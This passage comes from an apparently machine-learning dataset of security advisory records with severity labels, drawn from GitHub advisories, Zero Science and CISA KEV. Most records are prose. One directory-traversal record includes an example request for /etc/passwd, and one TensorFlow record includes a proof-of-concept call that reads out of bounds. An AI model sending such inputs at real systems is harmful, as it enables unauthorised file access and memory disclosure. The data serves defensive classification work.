Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d51ffd37167c60b36613", "text": "AWBS v2.9.6 Multiple Remote Vulnerabilities", "text_raw": "AWBS v2.9.6 Multiple Remote Vulnerabilities\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-07-05", "split": "train"} -{"id": "a145e27595ed9f42aafb", "text": "Prototype Pollution in property-expr\n\nThe package property-expr before 2.0.3 are vulnerable to Prototype Pollution via the setter function.", "text_raw": "Prototype Pollution in property-expr\n\n[Severity: CRITICAL]\n\nThe package property-expr before 2.0.3 are vulnerable to Prototype Pollution via the setter function.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "f453b5b632cc1e54772a", "text": "Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation", "text_raw": "Privacyware Privatefirewall 7.0 Unquoted Service Path Privilege Escalation\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2014-11-21", "split": "train"} -{"id": "4fb9eeaadfcfa6d8908e", "text": "Unbounded connection acceptance leads to file handle exhaustion\n\n### Impact\n\nAll servers running blaze-core <= 0.14.14, including blaze-http and http4s-blaze-server users, are affected.\n\nBlaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.\n\nThe vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.\n\n### Patches\n\nThe issue is fixed in version 0.14.15 for `NIO1SocketServerGroup`. A `maxConnections` parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number.\n\nThe `NIO2SocketServerGroup` has no such setting and is now deprecated.\n\n### Workarounds\n* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure.\n* A similar sidecar strategy is viable for other non-HTTP services running on blaze-core.\n* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake.\n* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.\n* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/blaze](http://github.com/http4s/blaze)\n* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)", "text_raw": "Unbounded connection acceptance leads to file handle exhaustion\n\n[Severity: HIGH]\n\n### Impact\n\nAll servers running blaze-core <= 0.14.14, including blaze-http and http4s-blaze-server users, are affected.\n\nBlaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.\n\nThe vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.\n\n### Patches\n\nThe issue is fixed in version 0.14.15 for `NIO1SocketServerGroup`. A `maxConnections` parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number.\n\nThe `NIO2SocketServerGroup` has no such setting and is now deprecated.\n\n### Workarounds\n* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure.\n* A similar sidecar strategy is viable for other non-HTTP services running on blaze-core.\n* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake.\n* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.\n* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/blaze](http://github.com/http4s/blaze)\n* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-02-02", "split": "train"} -{"id": "403907b2552a92da3c05", "text": "Regular Expression Denial of Service in csv-parse\n\nVersions of `csv-parse` prior to 4.4.6 are vulnerable to Regular Expression Denial of Service. The `__isInt()` function contains a malformed regular expression that processes large specially-crafted input very slowly, leading to a Denial of Service. This is triggered when using the `cast` option.\n\n## Recommendation\n\nUpgrade to version 4.4.6 or later.", "text_raw": "Regular Expression Denial of Service in csv-parse\n\n[Severity: HIGH]\n\nVersions of `csv-parse` prior to 4.4.6 are vulnerable to Regular Expression Denial of Service. The `__isInt()` function contains a malformed regular expression that processes large specially-crafted input very slowly, leading to a Denial of Service. This is triggered when using the `cast` option.\n\n\n## Recommendation\n\nUpgrade to version 4.4.6 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-10-15", "split": "train"} -{"id": "eca8fab93313e7ace540", "text": "Malicious Package in conistring\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in conistring\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "2e94eccfe483e84d6b4c", "text": "QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion", "text_raw": "QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2020-08-13", "split": "train"} -{"id": "eec11748882ce3816cc6", "text": "Exim Buffer Overflow Vulnerability\n\nAffected: Exim Exim\n\nExim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Exim Buffer Overflow Vulnerability\n\nAffected: Exim Exim\n\nExim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "93194c75648256f7b90d", "text": "Prototype Pollution in merge\n\nAll versions of package merge <2.1.1 are vulnerable to Prototype Pollution via _recursiveMerge .", "text_raw": "Prototype Pollution in merge\n\n[Severity: HIGH]\n\nAll versions of package merge <2.1.1 are vulnerable to Prototype Pollution via _recursiveMerge .", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-04", "split": "train"} -{"id": "4285a846742373b2079d", "text": "Withdrawn, accidental duplicate publish.\n\nCross-site scripting (XSS) vulnerability in lib/rails/html/scrubbers.rb in the rails-html-sanitizer gem before 1.0.3 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via a crafted CDATA node.", "text_raw": "Moderate severity vulnerability that affects rails-html-sanitizer\n\n[Severity: MEDIUM]\n\nWithdrawn, accidental duplicate publish.\r\n\r\nCross-site scripting (XSS) vulnerability in lib/rails/html/scrubbers.rb in the rails-html-sanitizer gem before 1.0.3 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via a crafted CDATA node.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-09-17", "split": "train"} -{"id": "490d773112654c18769f", "text": "Catastrophic backtracking in URL authority parser when passed URL containing many @ characters\n\n### Impact\n\nWhen provided with a URL containing many `@` characters in the authority component the authority regular expression exhibits catastrophic backtracking causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect.\n\n### Patches\n\nThe issue has been fixed in urllib3 v1.26.5.\n\n### References\n\n- [CVE-2021-33503](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503)\n- [JVNVU#92413403 (English)](https://jvn.jp/en/vu/JVNVU92413403/)\n- [JVNVU#92413403 (Japanese)](https://jvn.jp/vu/JVNVU92413403/)\n- [urllib3 v1.26.5](https://github.com/urllib3/urllib3/releases/tag/1.26.5)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Ask in our [community Discord](https://discord.gg/urllib3)\n* Email [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)", "text_raw": "Catastrophic backtracking in URL authority parser when passed URL containing many @ characters\n\n[Severity: HIGH]\n\n### Impact\n\nWhen provided with a URL containing many `@` characters in the authority component the authority regular expression exhibits catastrophic backtracking causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect.\n\n\n### Patches\n\nThe issue has been fixed in urllib3 v1.26.5.\n\n### References\n\n- [CVE-2021-33503](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503)\n- [JVNVU#92413403 (English)](https://jvn.jp/en/vu/JVNVU92413403/)\n- [JVNVU#92413403 (Japanese)](https://jvn.jp/vu/JVNVU92413403/)\n- [urllib3 v1.26.5](https://github.com/urllib3/urllib3/releases/tag/1.26.5)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Ask in our [community Discord](https://discord.gg/urllib3)\n* Email [sethmichaellarson@gmail.com](mailto:sethmichaellarson@gmail.com)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-01", "split": "train"} -{"id": "ceee4d9936c0b3d0dba6", "text": "CSRF vulnerability in Jenkins Xray - Test Management for Jira Plugin allows capturing credentials\n\nJenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not require POST requests for a connection test method, resulting in a cross-site request forgery (CSRF) vulnerability.\n\nThis vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.\n\nJenkins Xray - Test Management for Jira Plugin 2.4.1 requires POST requests for the affected connection test method.", "text_raw": "CSRF vulnerability in Jenkins Xray - Test Management for Jira Plugin allows capturing credentials\n\n[Severity: HIGH]\n\nJenkins Xray - Test Management for Jira Plugin 2.4.0 and earlier does not require POST requests for a connection test method, resulting in a cross-site request forgery (CSRF) vulnerability.\n\nThis vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.\n\nJenkins Xray - Test Management for Jira Plugin 2.4.1 requires POST requests for the affected connection test method.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "d08c04c7f04a333ee7df", "text": "FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure", "text_raw": "FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-10-14", "split": "train"} -{"id": "9ddb4c7058c884a452cc", "text": "The Java SockJS client in Pivotal Spring Framework 4.1.x before 4.1.5 generates predictable session ids, which allows remote attackers to send messages to other sessions via unspecified vectors.", "text_raw": "Moderate severity vulnerability that affects org.springframework:spring-core\n\n[Severity: MEDIUM]\n\nThe Java SockJS client in Pivotal Spring Framework 4.1.x before 4.1.5 generates predictable session ids, which allows remote attackers to send messages to other sessions via unspecified vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "59c4fa65ddd45bc0b62f", "text": "Directory Traversal in wangguojing123\n\nAffected versions of `wangguojing123` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in wangguojing123\n\n[Severity: HIGH]\n\nAffected versions of `wangguojing123` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "dc53a01d84773afc9d98", "text": "UnixAuthenticationService in Apache Ranger was updated to correctly handle user input to avoid Stack-based buffer overflow\n\nUnixAuthenticationService in Apache Ranger 1.2.0 was updated to correctly handle user input to avoid Stack-based buffer overflow. Versions prior to 1.2.0 should be upgraded to 1.2.0", "text_raw": "UnixAuthenticationService in Apache Ranger was updated to correctly handle user input to avoid Stack-based buffer overflow\n\n[Severity: HIGH]\n\nUnixAuthenticationService in Apache Ranger 1.2.0 was updated to correctly handle user input to avoid Stack-based buffer overflow. Versions prior to 1.2.0 should be upgraded to 1.2.0", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "16ecee0ded1a38f4c989", "text": "CSRF issue on preview pages in Bolt CMS\n\n### Impact\n\nBolt CMS lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview.\n\n### Patches\n\nThis has been fixed in Bolt 3.7.1\n\n### References\n\nRelated issue: https://github.com/bolt/bolt/pull/7853", "text_raw": "CSRF issue on preview pages in Bolt CMS\n\n[Severity: HIGH]\n\n### Impact\n\nBolt CMS lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview.\n\n### Patches\n\nThis has been fixed in Bolt 3.7.1\n\n### References\n\nRelated issue: https://github.com/bolt/bolt/pull/7853", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-09", "split": "train"} -{"id": "bae6671c20266735d5cb", "text": "Malicious Package in colour-string\n\nVersion 1.5.3 of `colour-string` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in colour-string\n\n[Severity: CRITICAL]\n\nVersion 1.5.3 of `colour-string` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "4022dde806db2487face", "text": "Malicious Package in buffgr-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in buffgr-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "da436adbbae553e1ca3c", "text": "Exposure of Sensitive Information to an Unauthorized Actor in Ansible\n\nA flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument \"password\" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in Ansible\n\n[Severity: LOW]\n\nA flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument \"password\" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-04-07", "split": "train"} -{"id": "b288f3b2e50b523f2b37", "text": "Blog comment posting, Cross Site Scripting(XSS) Vulnerability in Latest Release 4.4.0\n\nbaserCMS 4.4.0 and earlier is affected by Cross Site Scripting (XSS).\n\nImpact: XSS via Arbitrary script execution.\nComponents are: Blog comment posting\nTested baserCMS Version : 4.4.0 (Latest)\nAffected baserCMS Version : 4.0.0 ~ 4.4.0\nPatches : https://basercms.net/security/20201029\nFound by yama", "text_raw": "Blog comment posting, Cross Site Scripting(XSS) Vulnerability in Latest Release 4.4.0\n\n[Severity: LOW]\n\nbaserCMS 4.4.0 and earlier is affected by Cross Site Scripting (XSS).\n\nImpact: XSS via Arbitrary script execution.\nComponents are: Blog comment posting\nTested baserCMS Version : 4.4.0 (Latest)\nAffected baserCMS Version : 4.0.0 ~ 4.4.0\nPatches : https://basercms.net/security/20201029\nFound by yama", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-10-30", "split": "train"} -{"id": "6617664b840384fdd2b2", "text": "Withdrawn, accidental duplicate publish.\n\nAction Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "text_raw": "High severity vulnerability that affects actionpack\n\n[Severity: HIGH]\n\nWithdrawn, accidental duplicate publish.\n\nAction Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-08-13", "split": "train"} -{"id": "2beeb3a2c03a4fb46a87", "text": "tkinter is malware\n\nThe `tkinter` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.\n\nAll versions have been unpublished from the npm registry.\n\n## Recommendation\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.\n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.\n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "text_raw": "tkinter is malware\n\n[Severity: HIGH]\n\nThe `tkinter` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-11-01", "split": "train"} -{"id": "8e1329464e82e4a9da5b", "text": "mongodb-client-encryption vulnerable to Improper Certificate Validation\n\nA specific version of the Node.js mongodb-client-encryption module does not perform correct validation of the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Node.js driver and the KMS service rendering client-side field level encryption (CSFLE) ineffective. This issue was discovered during internal testing and affects mongodb-client-encryption module version 1.2.0, which was available from 2021-Jan-29 and deprecated in the NPM Registry on 2021-Feb-04. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services from applications residing inside the AWS, GCP, and Azure nework fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption. This issue affect MongoDB Node.js Driver mongodb-client-encryption module version 1.2.0", "text_raw": "mongodb-client-encryption vulnerable to Improper Certificate Validation\n\n[Severity: MEDIUM]\n\nA specific version of the Node.js mongodb-client-encryption module does not perform correct validation of the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Node.js driver and the KMS service rendering client-side field level encryption (CSFLE) ineffective. This issue was discovered during internal testing and affects mongodb-client-encryption module version 1.2.0, which was available from 2021-Jan-29 and deprecated in the NPM Registry on 2021-Feb-04. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services from applications residing inside the AWS, GCP, and Azure nework fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption. This issue affect MongoDB Node.js Driver mongodb-client-encryption module version 1.2.0", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-12", "split": "train"} -{"id": "aa34d37ff012e40d6db1", "text": "Heap OOB in `QuantizeAndDequantizeV3`\n\n### Impact\nAn attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.QuantizeAndDequantizeV3(\n input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30],\n signed_input=False, range_given=False, narrow_range=False, axis=3)\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237) does not validate the value of user supplied `axis` attribute before using it to index in the array backing the `input` argument:\n\n```cc\nconst int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);\n```\n\n### Patches\nWe have patched the issue in GitHub commit [99085e8ff02c3763a0ec2263e44daec416f6a387](https://github.com/tensorflow/tensorflow/commit/99085e8ff02c3763a0ec2263e44daec416f6a387).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Aivul Team from Qihoo 360.", "text_raw": "Heap OOB in `QuantizeAndDequantizeV3`\n\n[Severity: LOW]\n\n### Impact\nAn attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.QuantizeAndDequantizeV3(\n input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30],\n signed_input=False, range_given=False, narrow_range=False, axis=3)\n``` \n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237) does not validate the value of user supplied `axis` attribute before using it to index in the array backing the `input` argument:\n\n```cc\nconst int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);\n```\n\n### Patches\nWe have patched the issue in GitHub commit [99085e8ff02c3763a0ec2263e44daec416f6a387](https://github.com/tensorflow/tensorflow/commit/99085e8ff02c3763a0ec2263e44daec416f6a387).\n \nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Aivul Team from Qihoo 360.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "bfe2e2f76e6866f7787d", "text": "Unsafe Deserialization in jackson-databind\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.", "text_raw": "Unsafe Deserialization in jackson-databind\n\n[Severity: HIGH]\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-09", "split": "train"} -{"id": "a3ba246f197dace52faa", "text": "Prototype Pollution in deeply\n\nVersions of `deeply` prior to 1.0.1 are vulnerable to Prototype Pollution. The package fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.\n\n## Recommendation\n\nUpgrade to version 3.1.0 or later.", "text_raw": "Prototype Pollution in deeply\n\n[Severity: CRITICAL]\n\nVersions of `deeply` prior to 1.0.1 are vulnerable to Prototype Pollution. The package fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.\n\n\n\n\n## Recommendation\n\nUpgrade to version 3.1.0 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-08-27", "split": "train"} -{"id": "8e5234a3515c80f65819", "text": "Unsafe eval() in summit allows arbitrary code execution\n\nAffected versions of `summit` allow attackers to execute arbitrary commands via collection names when using the `PouchDB` driver.\n\n## Recommendation\n\nNo direct patch is available at this time.\n\nCurrently, the best option to mitigate the issue is to avoid using the `PouchDB` driver, as the package author has abandoned this feature entirely.", "text_raw": "Unsafe eval() in summit allows arbitrary code execution\n\n[Severity: CRITICAL]\n\nAffected versions of `summit` allow attackers to execute arbitrary commands via collection names when using the `PouchDB` driver.\n\n## Recommendation\n\nNo direct patch is available at this time.\n\nCurrently, the best option to mitigate the issue is to avoid using the `PouchDB` driver, as the package author has abandoned this feature entirely.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "949aa62d94ebe6564290", "text": "XSS vulnerability on asset view\n\n### Impact\nMautic versions before 3.3.4 / 4.0.0 are vulnerable to an inline JS XSS attack when viewing Mautic assets by utilizing inline JS in the title and adding a broken image URL as a remote asset. This can only be leveraged by an authenticated user with permission to create or edit assets.\n\n### Patches\nUpgrade to 3.3.4 or 4.0.0\n\n### Workarounds\nNo\n\n### References\nhttps://github.com/mautic/mautic/releases/tag/3.3.4\nhttps://github.com/mautic/mautic/releases/tag/4.0.0\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@mautic.org](mailto:security@mautic.org)", "text_raw": "XSS vulnerability on asset view\n\n[Severity: HIGH]\n\n### Impact\nMautic versions before 3.3.4 / 4.0.0 are vulnerable to an inline JS XSS attack when viewing Mautic assets by utilizing inline JS in the title and adding a broken image URL as a remote asset. This can only be leveraged by an authenticated user with permission to create or edit assets. \n\n### Patches\nUpgrade to 3.3.4 or 4.0.0\n\n### Workarounds\nNo\n\n### References\nhttps://github.com/mautic/mautic/releases/tag/3.3.4\nhttps://github.com/mautic/mautic/releases/tag/4.0.0\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@mautic.org](mailto:security@mautic.org)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "6831b2303fd0f5be5275", "text": "ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities", "text_raw": "ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-10-31", "split": "train"} -{"id": "3e2a523b63d3b2b907e5", "text": "Malicious Package in bowe\n\nVersion 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from 